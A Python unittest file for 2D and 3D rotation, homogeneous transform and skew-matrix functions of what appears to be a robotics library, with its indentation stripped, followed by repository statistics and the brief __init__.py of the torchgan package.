if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., -0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 0., -1., 0.], [0., 1., 0., 0.], [1., 0., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.troty, 'invalid', unit='deg')
def test_transforms_3d_troty_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.troty,
180, unit='invalid unit')
def test_transforms_3d_troty_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.troty, 180, unit=True)
def test_transforms_3d_troty_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.troty, 180, unit=5)
# trotz | complete
class Testtrotz(unittest.TestCase):
def test_transforms_3d_trotz_validData_returnDatatype(self):
self.assertIsInstance(transforms.trotz(0), np.matrix)
def test_transforms_3d_trotz_validData_returnData_dimension(self):
dimensions = transforms.trotz(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_trotz_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., -0., 0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0., 0.], [0., -1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0., 0.], [-1., -0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [-0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., -0., 0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [-0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0., 0.], [0., -1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0., 0.], [-1., -0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trotz, 'invalid', unit='deg')
def test_transforms_3d_trotz_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trotz,
180, unit='invalid unit')
def test_transforms_3d_trotz_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trotz, 180, unit=True)
def test_transforms_3d_trotz_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trotz, 180, unit=5)
# r2t
class TestR2t(unittest.TestCase):
def test_transforms_r2t_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.r2t(transforms.rotx(0)), np.matrix)
def test_transforms_r2t_validData_returnData_dimension(self): # pass
dimensions = transforms.r2t(transforms.rotx(0)).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_r2t_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.r2t(transforms.rotx(0))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_r2t_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.r2t(transforms.rotx(pi / 2))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# t2r
class TestT2r(unittest.TestCase):
def test_transforms_t2r_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.t2r(transforms.trotx(0)), np.matrix)
def test_transforms_t2r_validData_returnData_dimension(self): # pass
dimensions = transforms.t2r(transforms.trotx(0)).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_t2r_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, -0], [0, 0, 1]])
received_mat = transforms.t2r(transforms.trotx(0))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_t2r_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0.]])
received_mat = transforms.t2r(transforms.trotx(pi / 2))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# # rpy2r | ready
# class TestRpy2r(unittest.TestCase):
# def test_transforms_rpy2r_validData_returnDatatype(self): # pass
# self.assertIsInstance(transforms.rpy2r([[11, 1, 1]]), np.matrix)
# oa2tr
class TestOa2tr(unittest.TestCase):
def test_transforms_oa2tr_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.oa2tr([[1, 0, 1]], [[1, 1, 1]]), np.matrix)
# to test:
# tr2rt
# rt2tr
# trlog
# trexp
# ---------------------------------------------------------------------------------------#
# 2D Transforms
# ---------------------------------------------------------------------------------------#
# rot2
class Testrot2(unittest.TestCase):
def test_transforms_2d_rot2_validData_returnDatatype(self):
self.assertIsInstance(transforms.rot2(0), np.matrix)
def test_transforms_2d_rot2_validData_returnData_dimension(self):
dimensions = transforms.rot2(0).shape
self.assertEqual(dimensions, (2, 2))
def test_transforms_2d_rot2_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0], [0, 1]])
received_mat = transforms.rot2(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1, -0, ], [0, -1]])
received_mat = transforms.rot2(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0, 1, ], [-1, -0]])
received_mat = transforms.rot2(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, ], [-0, 1]])
received_mat = transforms.rot2(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, -0, ], [0, 1]])
received_mat = transforms.rot2(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, ], [-0, 1]])
received_mat = transforms.rot2(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1, -0, ], [0, -1]])
received_mat = transforms.rot2(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0, 1, ], [-1, -0]])
received_mat = transforms.rot2(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rot2, 'invalid', unit='deg')
def test_transforms_2d_rot2_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rot2,
180, unit='invalid unit')
def test_transforms_2d_rot2_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rot2, 180, unit=True)
def test_transforms_2d_rot2_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rot2, 180, unit=5)
# trot2
class Testtrot2(unittest.TestCase):
def test_transforms_2d_trot2_validData_returnDatatype(self):
self.assertIsInstance(transforms.trot2(0), np.matrix)
def test_transforms_2d_trot2_validData_returnData_dimension(self):
dimensions = transforms.trot2(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_2d_trot2_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., -0., 0.], [0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0.], [0., -1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1., -0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0.], [-0., 1., 0.], [0, 0, 1]])
received_mat = transforms.trot2(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., -0., 0.], [0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0.], [-0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0.], [0., -1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1., -0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trot2, 'invalid', unit='deg')
def test_transforms_2d_trot2_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trot2,
180, unit='invalid unit')
def test_transforms_2d_trot2_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trot2, 180, unit=True)
def test_transforms_2d_trot2_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trot2, 180, unit=5)
# trexp2
class Testtrexp2(unittest.TestCase):
def test_transforms_2d_trexp2_validData_returnDatatype(self):
self.assertIsInstance(transforms.trexp2(transforms.rot2(10)), np.matrix)
# ---------------------------------------------------------------------------------------#
# Differential Motion
# ---------------------------------------------------------------------------------------#
# skew
class TestSkew(unittest.TestCase):
# Tests for if the vector is 1
# Ensure matrix is returned
def test_transforms_dif_skew_validData_returnDatatype(self):
self.assertIsInstance(transforms.skew(np.matrix([1])), np.matrix)
# Check Matrix Dimensions vectorsize=1
def test_transforms_dif_skew_validData_returnData_dimension(self):
dimensions = transforms.skew(np.matrix([1])).shape
self.assertEqual(dimensions, (2, 2))
# Tests for if the vector is 3
# Ensure matrix is returned
def test_transforms_dif_skew_validData_returnDatatype_v3(self):
self.assertIsInstance(transforms.skew(np.matrix([1, 1, 1])), np.matrix)
# Check Matrix Dimensions vectorsize=1
def test_transforms_dif_skew_validData_returnData_dimension_v3(self):
dimensions = transforms.skew(np.matrix([1, 1, 1])).shape
self.assertEqual(dimensions, (3, 3))
# boundary for vectore size of 1
def test_transforms_dif_skew_validData_boundaryCondition_1(self):
expected_mat = np.matrix([[0, -1], [1, 0]])
received_mat = transforms.skew(np.matrix([1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_2(self):
expected_mat = np.matrix([[0, -2], [2, 0]])
received_mat = transforms.skew(np.matrix([2]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_3(self):
expected_mat = np.matrix([[0, -3], [3, 0]])
received_mat = transforms.skew(np.matrix([3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_4(self):
expected_mat = np.matrix([[0, -4], [4, 0]])
received_mat = transforms.skew(np.matrix([4]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_5(self):
expected_mat = np.matrix([[0, -5], [5, 0]])
received_mat = transforms.skew(np.matrix([5]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# boundary tests if 3 vector
def test_transforms_dif_skew_validData_boundaryCondition_111(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, -1], [-1, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_101(self):
expected_mat = np.matrix([[0, -1, 0], [1, 0, -1], [0, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 0, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_100(self):
expected_mat = np.matrix([[0, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 0, 0]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_321(self):
expected_mat = np.matrix([[0, -1, 2], [1, 0, -3], [-2, 3, 0]])
received_mat = transforms.skew(np.matrix([3, 2, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# skewa
class TestSkewa(unittest.TestCase):
# Tests for if the vector is 3x1
# Ensure matrix is returned
def test_transforms_dif_skewa_validData_returnDatatype(self):
self.assertIsInstance(transforms.skewa(np.matrix([1, 1, 1])), np.matrix)
# Check Matrix Dimensions vectorsize=3x1
def test_transforms_dif_skewa_validData_returnData_dimension(self):
dimensions = transforms.skewa(np.matrix([1, 1, 1])).shape
self.assertEqual(dimensions, (3, 3))
# Tests for if the vector is 6x1
# Ensure matrix is returned
def test_transforms_dif_skewa_validData_returnDatatype_v3(self):
self.assertIsInstance(transforms.skewa(np.matrix([1, 1, 1, 1, 1, 1])), np.matrix)
# Check Matrix Dimensions of 4x4 if v = 6x1
def test_transforms_dif_skew_validData_returnData_dimension_v3(self):
dimensions = transforms.skewa(np.matrix([1, 1, 1, 1, 1, 1])).shape
self.assertEqual(dimensions, (4, 4))
# boundary for vectore size of 1
def test_transforms_dif_skewa_validData_boundaryCondition_1(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 1], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_2(self):
expected_mat = np.matrix([[0, -3, 1], [3, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 2, 3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# def test_transforms_dif_skewa_validData_boundaryCondition_2_6x1(self):
# expected_mat = np.matrix([[1, 0], [0, 1]])
# received_mat = transforms.skewa(np.matrix([]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_2_4x4(self):
expected_mat = np.matrix([[0, -1, 1, 1], [1, 0, -1, 0], [-1, 1, 0, 1], [0, 0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 1, 1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# boundary tests if 3 vector
def test_transforms_dif_skewa_validData_boundaryCondition_111(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 1], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_101(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 0], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_100(self):
expected_mat = np.matrix([[0, 0, 1], [0, 0, 0], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 0]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_123(self):
expected_mat = np.matrix([[0, -3, 1], [3, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 2, 3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_321(self):
expected_mat = np.matrix([[0, -1, 3], [1, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([3, 2, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# vex
class TestVex(unittest.TestCase):
# test for 3x3 matrix
def test_transforms_dif_vex_validData_returnDatatype1(self):
self.assertIsInstance(transforms.vex(transforms.rotx(30)), np.matrix)
# ensure returns 3x1 if matrix is 3x3
def test_transforms_dif_vex_validData_returnData_dimension1(self):
dimensions = transforms.vex(transforms.rotx(30)).shape
self.assertEqual(dimensions, (3, 1))
def test_transforms_dif_vex_validData_returnDatatype2(self):
self.assertIsInstance(transforms.vex(transforms.rot2(0)), np.matrix)
# ensure returns 1 if matrix is 2x2
def test_transforms_dif_vex_validData_returnData_dimension2(self):
dimensions = transforms.vex(transforms.rot2(30)).shape
self.assertEqual(dimensions, (1, 1))
def test_transforms_dif_vex_validData_boundaryCondition_rot_0(self):
expected_mat = np.matrix([[0.], [0.], [0.]])
received_mat = transforms.vex(transforms.roty(0))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# # check whats going on herie
# def test_transforms_dif_vex_validData_boundaryCondition_roty_30(self):
# expected_mat = np.matrix([[0.], [-0.98803162], [0.]])
# received_mat = transforms.vex(transforms.roty(30))
#
# if not matrices_equal(received_mat, expected_mat, ):
# output_str = matrix_mismatch_string_builder(
# expected_mat, received_mat)
# self.fail(output_str)
# ---------------------------------------------------------------------------------------#
# Utility
# ---------------------------------------------------------------------------------------#
# unit
if __name__ == "__main__":
unittest.main()
| 43.445596 | 109 | 0.640872 | 7,433 | 58,695 | 4.719494 | 0.021929 | 0.02862 | 0.025228 | 0.017674 | 0.970468 | 0.96126 | 0.91394 | 0.866334 | 0.797121 | 0.776397 | 0 | 0.045942 | 0.228282 | 58,695 | 1,350 | 110 | 43.477778 | 0.728519 | 0.043189 | 0 | 0.587185 | 0 | 0 | 0.00585 | 0 | 0 | 0 | 0 | 0 | 0.069328 | 1 | 0.184874 | false | 0 | 0.005252 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f285c34e8c7c1687aedcf675a8c87f3989c79a09 | 186 | py | Python | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | 1 | 2019-01-21T12:53:50.000Z | 2019-01-21T12:53:50.000Z | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | null | null | null | torchgan/__init__.py | shubhsherl/torchgan | 3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d | [
"MIT"
] | null | null | null | from torchgan import losses
from torchgan import models
from torchgan import trainer
from torchgan import metrics
from torchgan import logging
__version__ = 'v0.0.2'
name = "torchgan"
